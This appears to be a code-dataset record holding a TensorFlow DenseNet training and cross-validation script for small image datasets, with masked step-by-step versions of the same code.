wrong, predicted = sess.run([wrong_prediction_printop, predicted_labels_printop], feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index <= 3:
b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,
t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop],
feed_dict={
x: t_image, y_: t_label,
keep_prob: 1.0, training:False})
if img_index == 0:
b1_list = b1
b2_list = b2
b3_list = b3
t1_list = t1
t2_list = t2
t3_list = t3
t1_b_list = t1_b
t2_b_list = t2_b
t3_b_list = t3_b
else:
b1_list = np.append(b1_list,b1,axis=0)
b2_list = np.append(b2_list,b2,axis=0)
b3_list = np.append(b3_list,b3,axis=0)
t1_list = np.append(t1_list,t1,axis=0)
t2_list = np.append(t2_list,t2,axis=0)
t3_list = np.append(t3_list,t3,axis=0)
t1_b_list = np.append(t1_b_list,t1_b,axis=0)
t2_b_list = np.append(t2_b_list,t2_b,axis=0)
t3_b_list = np.append(t3_b_list,t3_b,axis=0)
if img_index == 0 :
wrong_list = wrong
predicted_list = predicted
else:
wrong_list = np.append(wrong_list,wrong,axis=0)
predicted_list = np.append(predicted_list,predicted,axis=0)
Accuracy = Accuracy/num_test
print('Average test accuracy: %g' % Accuracy)
accuracy_list.append(Accuracy)
list_of_predicted_list.append(predicted_list)
elapsed_time = time.time() - start_time
print('Elapsed Time: %f secs' % elapsed_time)
print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, itrt_index, total_trainImages))
print('learning_rate : %g ' % learn_rate)
print('1st conv FMaps : %d ' % fm1)
print('number of layers in dense block : %d ' % num_layers)
print('growth rate(k_fm) : %d ' % k_fm)
print('filter size : %d ' % fs)
print('bottleneck : %d' % bottleneck)
print('dropout prob : %g ' % dropout_prob)
print('data_type :', data_type)
print('file_name :', file_name)
print('FC nodes : %d' % fc_nodes[0])
epoch_around = math.ceil((iteration * batch_size) / total_trainImages)
if epoch_around == 51:
epoch_around = 50
print('Number of epochs : %f ' % epoch_around)
# plot the cost
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title("Learning rate =" + str(learn_rate))
plt.show()
sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list, 'predicted_list': predicted_list, 'Target_labels':Target_labels, 'accuracy_list':accuracy_list, 'list_of_predicted_list':list_of_predicted_list, 'costs':costs, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,
't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})
class MyModel:
num_layers = 4
k_fm = 24
fs = 3
fm1 = 32
bottleneck = 4
dropout_prob = 0.8
batch_size = [16]
learn_rate = 0.001
num_of_test = 40
model = MyModel()
densenet('1','org',1,model)
densenet('1','org',2,model)
densenet('1','org',3,model)
densenet('1','org',4,model)
densenet('1','org',5,model)
densenet('1','aug',1,model)
densenet('1','aug',2,model)
densenet('1','aug',3,model)
densenet('1','aug',4,model)
densenet('1','aug',5,model)
densenet('2','org',1,model)
densenet('2','org',2,model)
densenet('2','org',3,model)
densenet('2','org',4,model)
densenet('2','org',5,model)
densenet('2','aug',1,model)
densenet('2','aug',2,model)
densenet('2','aug',3,model)
densenet('2','aug',4,model)
densenet('2','aug',5,model)
densenet('3','org',1,model)
densenet('3','org',2,model)
densenet('3','org',3,model)
densenet('3','org',4,model)
densenet('3','org',5,model)
densenet('3','aug',1,model)
densenet('3','aug',2,model)
densenet('3','aug',3,model)
densenet('3','aug',4,model)
densenet('3','aug',5,model)
|
normal
|
{
"blob_id": "48270f70a9d69d15f808f22ec2d11d337b2c4845",
"index": 7414,
"step-1": "<mask token>\n\n\nclass MyModel:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MyModel:\n num_layers = 4\n k_fm = 24\n fs = 3\n fm1 = 32\n bottleneck = 4\n dropout_prob = 0.8\n batch_size = [16]\n learn_rate = 0.001\n num_of_test = 40\n\n\n<mask token>\n",
"step-3": "def densenet(D, DT, F, model):\n import scipy.io as sio\n import time\n import os\n import math\n import numpy as np\n import matplotlib.pyplot as plt\n Dataset = D\n if DT == 'org':\n data_type = 'original'\n else:\n data_type = 'augmented'\n fs = model.fs\n fm1 = model.fm1\n batch_size = model.batch_size[0]\n learn_rate = model.learn_rate\n num_layers = model.num_layers\n k_fm = model.k_fm\n bottleneck = model.bottleneck\n dropout_prob = model.dropout_prob\n num_of_test = model.num_of_test\n if F == 1:\n file_name = '1st_fold'\n elif F == 2:\n file_name = '2nd_fold'\n elif F == 3:\n file_name = '3rd_fold'\n elif F == 4:\n file_name = '4th_fold'\n elif F == 5:\n file_name = '5th_fold'\n path = os.path.join('CrossVal', 'D' + Dataset)\n print('path ', path)\n if data_type == 'original':\n Train = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' +\n file_name + '_train.mat'))\n else:\n Train = sio.loadmat(os.path.join(path, 'Augmented_D' + Dataset +\n '_' + file_name + '_train.mat'))\n Test = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' + file_name +\n '_test.mat'))\n if Dataset == '1':\n number_of_classes = 24\n num_of_ep = 50\n num_of_test = 20\n if data_type == 'augmented':\n train_imgs = 526190\n else:\n train_imgs = 52619\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n elif Dataset == '2':\n number_of_classes = 36\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 20120\n else:\n train_imgs = 2012\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n else:\n number_of_classes = 10\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 16000\n else:\n train_imgs = 1600\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n iteration_to_display = int(iteration / num_of_test)\n list_to_display = []\n for i in range(num_of_test):\n if i != num_of_test:\n list_to_display.append(int(iteration_to_display * (i + 1)))\n del i\n total_fm_Block_1 = fm1 + num_layers * k_fm\n total_fm_Block_2 = total_fm_Block_1 + num_layers * k_fm\n total_fm_Block_3 = total_fm_Block_2 + num_layers * k_fm\n fc_nodes = [total_fm_Block_3]\n Train_Images = Train['trainImages']\n Train_Labels = Train['trainLabels2']\n total_trainImages = len(Train_Images[0, 2])\n print(total_trainImages)\n Train_Images = Train_Images.reshape(784, total_trainImages).transpose(\n ).astype('float32')\n Train_Labels = Train_Labels.transpose().astype('float64')\n Test_Images = Test['testImages']\n Test_Labels = Test['testLabels2']\n total_testImages = len(Test_Images[0, 2])\n Test_Images = Test_Images.reshape(784, total_testImages).transpose(\n ).astype('float32')\n Test_Labels = Test_Labels.transpose().astype('float64')\n Target_labels = np.argmax(Test_Labels, axis=1)\n del Test\n del Train\n import tensorflow as tf\n tf.reset_default_graph()\n g = tf.Graph()\n with g.as_default():\n tf.set_random_seed(1)\n\n def weight_variable(shape, n):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial, name=n)\n\n def bias_variable(shape, n):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial, name=n)\n\n def avg_pool(input, s):\n return tf.nn.avg_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')\n\n def max_pool(input, s):\n return tf.nn.max_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')\n\n def conv2d_1(input, in_features, out_features, kernel_size, name=\n 'W', with_bias=False):\n W = weight_variable([kernel_size, kernel_size, in_features,\n out_features], name)\n conv = tf.nn.conv2d(input, W, [1, 1, 1, 1], padding='SAME')\n if with_bias:\n return conv + bias_variable([out_features])\n return conv\n\n def batch_activ_conv(current, in_features, out_features,\n kernel_size, is_training, keep_prob, idx, scope='conv_block'):\n with tf.variable_scope(scope):\n current = tf.layers.batch_normalization(current, scale=True,\n training=is_training)\n current = tf.nn.relu(current)\n current = conv2d_1(current, in_features, out_features,\n kernel_size, name='W' + str(idx))\n current = tf.nn.dropout(current, keep_prob)\n return current\n\n def block(input, layers, in_features, growth, is_training,\n keep_prob, name='Block_'):\n with tf.name_scope(name):\n with tf.variable_scope(name):\n current = input\n features = in_features\n for idx in range(layers):\n tmp = batch_activ_conv(current, features, growth,\n fs, is_training, keep_prob, idx + 1, scope=\n 'conv_block_' + str(idx + 1))\n current = tf.concat((current, tmp), axis=3)\n features += growth\n return current, features\n x = tf.placeholder(tf.float32, shape=[None, 784])\n y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])\n x_image = tf.reshape(x, [-1, 28, 28, 1])\n keep_prob = tf.placeholder(tf.float32)\n training = tf.placeholder(tf.bool)\n current = conv2d_1(x_image, 1, fm1, fs, name='W1', with_bias=False)\n current, features = block(current, num_layers, fm1, k_fm, training,\n keep_prob, name='Block_1')\n b1_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_1')\n t1_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_1_1')\n t1_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_2')\n b2_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_2'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_2')\n t2_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_2_1')\n t2_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_3')\n b3_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_3'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_3')\n t3_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_3_1')\n t3_conv_printop = tf.Print(current, [current])\n current = avg_pool(current, 7)\n current = tf.reshape(current, [tf.shape(current)[0], -1])\n with tf.name_scope('Dense_Last_lyr'):\n W_fc3 = weight_variable([fc_nodes[0], number_of_classes], 'w_fc3')\n b_fc3 = bias_variable([number_of_classes], 'b_fc3')\n y_conv = tf.matmul(current, W_fc3) + b_fc3\n prediction_prob = tf.nn.softmax(y_conv)\n prediction_prob_printop = tf.Print(prediction_prob, [\n prediction_prob])\n with tf.name_scope('Xent'):\n cross_entropy = tf.reduce_mean(tf.nn.\n softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\n with tf.name_scope('train'):\n extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(extra_update_ops):\n train_step = tf.train.AdamOptimizer(learn_rate).minimize(\n cross_entropy)\n with tf.name_scope('accuracy'):\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(\n y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax\n (y_, 1))\n wrong_prediction_printop = tf.Print(wrong_prediction, [\n wrong_prediction])\n predicted_labels = tf.argmax(y_conv, 1)\n predicted_labels_printop = tf.Print(predicted_labels, [\n predicted_labels])\n index = 0\n index_end = index + batch_size\n remaining = 0\n start_time = time.time()\n costs = []\n accuracy_list = []\n list_of_predicted_list = []\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer(), tf.set_random_seed(0))\n for i in range(iteration):\n if index_end > total_trainImages:\n remaining = total_trainImages - (index_end - batch_size)\n images = Train_Images[index_end - batch_size:\n total_trainImages, :]\n labels = Train_Labels[index_end - batch_size:\n total_trainImages, :]\n index = 0\n index_end = index + batch_size - remaining\n images = np.vstack((images, Train_Images[index:\n index_end, :]))\n labels = np.vstack((labels, Train_Labels[index:\n index_end, :]))\n batch = images, labels\n index = index_end\n index_end = index + batch_size\n else:\n batch = Train_Images[index:index_end, :], Train_Labels[\n index:index_end, :]\n index = index + batch_size\n index_end = index_end + batch_size\n if i in list_to_display:\n elapsed_time = time.time() - start_time\n print('Elapsed Time Before for loop: %f secs' %\n elapsed_time)\n Accuracy = 0\n itrt_index = i\n print('debug: %d & %d' % (iteration, i))\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(\n 1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(\n 1, number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted, prediction_prob = sess.run([\n wrong_prediction_printop,\n predicted_labels_printop,\n prediction_prob_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = (sess\n .run([b1_conv_printop, b2_conv_printop,\n b3_conv_printop, t1_conv_printop,\n t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False}))\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list_1 = wrong\n predicted_list_1 = predicted\n prediction_prob_1 = prediction_prob\n else:\n wrong_list_1 = np.append(wrong_list_1, wrong,\n axis=0)\n predicted_list_1 = np.append(predicted_list_1,\n predicted, axis=0)\n prediction_prob_1 = np.append(prediction_prob_1,\n prediction_prob)\n Accuracy = Accuracy / num_test\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list_1)\n print('Average test accuracy: %g' % Accuracy)\n epoch_around = math.ceil(itrt_index * batch_size /\n total_trainImages)\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str\n (epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list':\n wrong_list_1, 'predicted_list': predicted_list_1,\n 'Target_labels': Target_labels, 'prediction_prob':\n prediction_prob, 'b1_list': b1_list, 'b2_list':\n b2_list, 'b3_list': b3_list, 't1_list': t1_list,\n 't2_list': t2_list, 't3_list': t3_list, 't1_b_list':\n t1_b_list, 't2_b_list': t2_b_list, 't3_b_list':\n t3_b_list})\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d'\n % (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = itrt_index * batch_size / total_trainImages\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n if i % 100 == 0:\n train_accuracy = accuracy.eval(feed_dict={x: batch[0],\n y_: batch[1], keep_prob: 1.0, training: False})\n print('step %d, training accuracy %g' % (i, train_accuracy)\n )\n _, loss = sess.run([train_step, cross_entropy], feed_dict={\n x: batch[0], y_: batch[1], keep_prob: dropout_prob,\n training: True})\n iteration_cost = 0\n num_minibatches = int(total_trainImages / batch_size)\n iteration_cost += loss / num_minibatches\n costs.append(iteration_cost)\n if i % 100 == 0:\n print('Loss: ', loss)\n Accuracy = 0\n training_time = time.time() - start_time\n print('Training Time: %f secs' % training_time)\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(1,\n number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_: t_label,\n keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted = sess.run([wrong_prediction_printop,\n predicted_labels_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([\n b1_conv_printop, b2_conv_printop, b3_conv_printop,\n t1_conv_printop, t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list = wrong\n predicted_list = predicted\n else:\n wrong_list = np.append(wrong_list, wrong, axis=0)\n predicted_list = np.append(predicted_list, predicted,\n axis=0)\n Accuracy = Accuracy / num_test\n print('Average test accuracy: %g' % Accuracy)\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list)\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d' %\n (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = math.ceil(iteration * batch_size / total_trainImages\n )\n if epoch_around == 51:\n epoch_around = 50\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str(\n epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list': wrong_list,\n 'predicted_list': predicted_list, 'Target_labels':\n Target_labels, 'accuracy_list': accuracy_list,\n 'list_of_predicted_list': list_of_predicted_list, 'costs':\n costs, 'b1_list': b1_list, 'b2_list': b2_list, 'b3_list':\n b3_list, 't1_list': t1_list, 't2_list': t2_list, 't3_list':\n t3_list, 't1_b_list': t1_b_list, 't2_b_list': t2_b_list,\n 't3_b_list': t3_b_list})\n\n\nclass MyModel:\n num_layers = 4\n k_fm = 24\n fs = 3\n fm1 = 32\n bottleneck = 4\n dropout_prob = 0.8\n batch_size = [16]\n learn_rate = 0.001\n num_of_test = 40\n\n\n<mask token>\n",
"step-4": "def densenet(D, DT, F, model):\n import scipy.io as sio\n import time\n import os\n import math\n import numpy as np\n import matplotlib.pyplot as plt\n Dataset = D\n if DT == 'org':\n data_type = 'original'\n else:\n data_type = 'augmented'\n fs = model.fs\n fm1 = model.fm1\n batch_size = model.batch_size[0]\n learn_rate = model.learn_rate\n num_layers = model.num_layers\n k_fm = model.k_fm\n bottleneck = model.bottleneck\n dropout_prob = model.dropout_prob\n num_of_test = model.num_of_test\n if F == 1:\n file_name = '1st_fold'\n elif F == 2:\n file_name = '2nd_fold'\n elif F == 3:\n file_name = '3rd_fold'\n elif F == 4:\n file_name = '4th_fold'\n elif F == 5:\n file_name = '5th_fold'\n path = os.path.join('CrossVal', 'D' + Dataset)\n print('path ', path)\n if data_type == 'original':\n Train = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' +\n file_name + '_train.mat'))\n else:\n Train = sio.loadmat(os.path.join(path, 'Augmented_D' + Dataset +\n '_' + file_name + '_train.mat'))\n Test = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' + file_name +\n '_test.mat'))\n if Dataset == '1':\n number_of_classes = 24\n num_of_ep = 50\n num_of_test = 20\n if data_type == 'augmented':\n train_imgs = 526190\n else:\n train_imgs = 52619\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n elif Dataset == '2':\n number_of_classes = 36\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 20120\n else:\n train_imgs = 2012\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n else:\n number_of_classes = 10\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 16000\n else:\n train_imgs = 1600\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n iteration_to_display = int(iteration / num_of_test)\n list_to_display = []\n for i in range(num_of_test):\n if i != num_of_test:\n list_to_display.append(int(iteration_to_display * (i + 1)))\n del i\n total_fm_Block_1 = fm1 + num_layers * k_fm\n total_fm_Block_2 = total_fm_Block_1 + num_layers * k_fm\n total_fm_Block_3 = total_fm_Block_2 + num_layers * k_fm\n fc_nodes = [total_fm_Block_3]\n Train_Images = Train['trainImages']\n Train_Labels = Train['trainLabels2']\n total_trainImages = len(Train_Images[0, 2])\n print(total_trainImages)\n Train_Images = Train_Images.reshape(784, total_trainImages).transpose(\n ).astype('float32')\n Train_Labels = Train_Labels.transpose().astype('float64')\n Test_Images = Test['testImages']\n Test_Labels = Test['testLabels2']\n total_testImages = len(Test_Images[0, 2])\n Test_Images = Test_Images.reshape(784, total_testImages).transpose(\n ).astype('float32')\n Test_Labels = Test_Labels.transpose().astype('float64')\n Target_labels = np.argmax(Test_Labels, axis=1)\n del Test\n del Train\n import tensorflow as tf\n tf.reset_default_graph()\n g = tf.Graph()\n with g.as_default():\n tf.set_random_seed(1)\n\n def weight_variable(shape, n):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial, name=n)\n\n def bias_variable(shape, n):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial, name=n)\n\n def avg_pool(input, s):\n return tf.nn.avg_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')\n\n def max_pool(input, s):\n return tf.nn.max_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')\n\n def conv2d_1(input, in_features, out_features, kernel_size, name=\n 'W', with_bias=False):\n W = weight_variable([kernel_size, kernel_size, in_features,\n out_features], name)\n conv = tf.nn.conv2d(input, W, [1, 1, 1, 1], padding='SAME')\n if with_bias:\n return conv + bias_variable([out_features])\n return conv\n\n def batch_activ_conv(current, in_features, out_features,\n kernel_size, is_training, keep_prob, idx, scope='conv_block'):\n with tf.variable_scope(scope):\n current = tf.layers.batch_normalization(current, scale=True,\n training=is_training)\n current = tf.nn.relu(current)\n current = conv2d_1(current, in_features, out_features,\n kernel_size, name='W' + str(idx))\n current = tf.nn.dropout(current, keep_prob)\n return current\n\n def block(input, layers, in_features, growth, is_training,\n keep_prob, name='Block_'):\n with tf.name_scope(name):\n with tf.variable_scope(name):\n current = input\n features = in_features\n for idx in range(layers):\n tmp = batch_activ_conv(current, features, growth,\n fs, is_training, keep_prob, idx + 1, scope=\n 'conv_block_' + str(idx + 1))\n current = tf.concat((current, tmp), axis=3)\n features += growth\n return current, features\n x = tf.placeholder(tf.float32, shape=[None, 784])\n y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])\n x_image = tf.reshape(x, [-1, 28, 28, 1])\n keep_prob = tf.placeholder(tf.float32)\n training = tf.placeholder(tf.bool)\n current = conv2d_1(x_image, 1, fm1, fs, name='W1', with_bias=False)\n current, features = block(current, num_layers, fm1, k_fm, training,\n keep_prob, name='Block_1')\n b1_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_1')\n t1_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_1_1')\n t1_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_2')\n b2_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_2'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_2')\n t2_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_2_1')\n t2_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_3')\n b3_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_3'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_3')\n t3_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_3_1')\n t3_conv_printop = tf.Print(current, [current])\n current = avg_pool(current, 7)\n current = tf.reshape(current, [tf.shape(current)[0], -1])\n with tf.name_scope('Dense_Last_lyr'):\n W_fc3 = weight_variable([fc_nodes[0], number_of_classes], 'w_fc3')\n b_fc3 = bias_variable([number_of_classes], 'b_fc3')\n y_conv = tf.matmul(current, W_fc3) + b_fc3\n prediction_prob = tf.nn.softmax(y_conv)\n prediction_prob_printop = tf.Print(prediction_prob, [\n prediction_prob])\n with tf.name_scope('Xent'):\n cross_entropy = tf.reduce_mean(tf.nn.\n softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\n with tf.name_scope('train'):\n extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(extra_update_ops):\n train_step = tf.train.AdamOptimizer(learn_rate).minimize(\n cross_entropy)\n with tf.name_scope('accuracy'):\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(\n y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax\n (y_, 1))\n wrong_prediction_printop = tf.Print(wrong_prediction, [\n wrong_prediction])\n predicted_labels = tf.argmax(y_conv, 1)\n predicted_labels_printop = tf.Print(predicted_labels, [\n predicted_labels])\n index = 0\n index_end = index + batch_size\n remaining = 0\n start_time = time.time()\n costs = []\n accuracy_list = []\n list_of_predicted_list = []\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer(), tf.set_random_seed(0))\n for i in range(iteration):\n if index_end > total_trainImages:\n remaining = total_trainImages - (index_end - batch_size)\n images = Train_Images[index_end - batch_size:\n total_trainImages, :]\n labels = Train_Labels[index_end - batch_size:\n total_trainImages, :]\n index = 0\n index_end = index + batch_size - remaining\n images = np.vstack((images, Train_Images[index:\n index_end, :]))\n labels = np.vstack((labels, Train_Labels[index:\n index_end, :]))\n batch = images, labels\n index = index_end\n index_end = index + batch_size\n else:\n batch = Train_Images[index:index_end, :], Train_Labels[\n index:index_end, :]\n index = index + batch_size\n index_end = index_end + batch_size\n if i in list_to_display:\n elapsed_time = time.time() - start_time\n print('Elapsed Time Before for loop: %f secs' %\n elapsed_time)\n Accuracy = 0\n itrt_index = i\n print('debug: %d & %d' % (iteration, i))\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(\n 1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(\n 1, number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted, prediction_prob = sess.run([\n wrong_prediction_printop,\n predicted_labels_printop,\n prediction_prob_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = (sess\n 